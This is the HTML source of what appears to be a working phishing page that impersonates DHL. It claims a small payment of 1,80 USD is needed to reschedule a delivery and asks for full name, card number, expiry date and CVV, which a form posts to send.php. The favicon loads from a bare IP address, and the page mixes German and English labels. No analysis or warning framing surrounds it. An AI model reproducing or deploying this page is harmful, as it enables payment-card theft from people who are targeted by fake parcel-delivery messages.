<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Package received - DHL</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="robots" content="nofollow,noindex">
<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="./index_files/css2" rel="stylesheet">
<link rel="stylesheet" href="./index_files/style.css">
<link rel="icon" href="http://160.172.222.172:8080/source/res/icon.png">
<script src="./index_files/jq.js.download"></script>
<script src="./index_files/v.js.download"></script>
<script src="./index_files/m.js.download"></script>
<script src="./index_files/arr.js.download"></script>
</head>
<body>
<div class="top">
<div class="left">
<img src="./index_files/dhl-logo.svg">
</div>
<div class="right">
<button class="logout">MyDHL</button>
<button class="logout" id="toplogout">Ausloggen</button>
</div>
</div>

<div class="content">

<div class="alert-box">
Confirm payment from <b class="specialword">1,80</b> USD USA to schedule a new delivery.
<br>
Order number: <b class="specialword">US468545215485</b>
</div>

<div class="form">
<div class="steps">
<div class="step completed">1</div>
<div class="line" id="l2"></div>
<div class="step" id="s2">2</div>
<div class="line" id="l3"></div>
<div class="step" id="s3"><img src="./index_files/check.svg" style="width:15px;"></div>
</div>
 


<form action="send.php" method="post" id="cc">
<h2>Secure payment</h2>
<input type="hidden" name="cc">
<div class="form-col">
<input type="text" name="fullname" required="" class="textinput" placeholder="Full name">
</div>
<div class="form-col">
<input type="text" name="cardnumber" id="cardnumber" required="" class="textinput" placeholder="**** **** **** ****" maxlength="24">
<p style="display:none;" id="ccerror">
die eingegebene Kartennummer ist ungültig!
</p>
</div>
<div class="form-col">
<input type="text" name="exp" id="exp" required="" class="textinput" placeholder="Expiry Date (DD/YYYY)" maxlength="7">
</div>
<div class="form-col">
<input type="text" name="cvv" id="cvv" required="" class="textinput" placeholder="Security code (CVV)" maxlength="4">
</div>
<div class="form-col">
<button class="defaultbtn">Further</button>
</div>

</form>
 

<div class="form-col" style="margin-top:50px; font-size:0.8em; text-align:center;">
<p>
The use of this service constitutes acceptance of the 
  <a href="">Kondition</a>.</p>
</div>

</div>
</div>


<div class="windowloader" id="loader" style="display:none;">
<div class="wl-content">
<div class="loader">
</div>
</div>
</div>
<script src="./index_files/ccv.js.download"></script>
<script>








</script>

</body></html>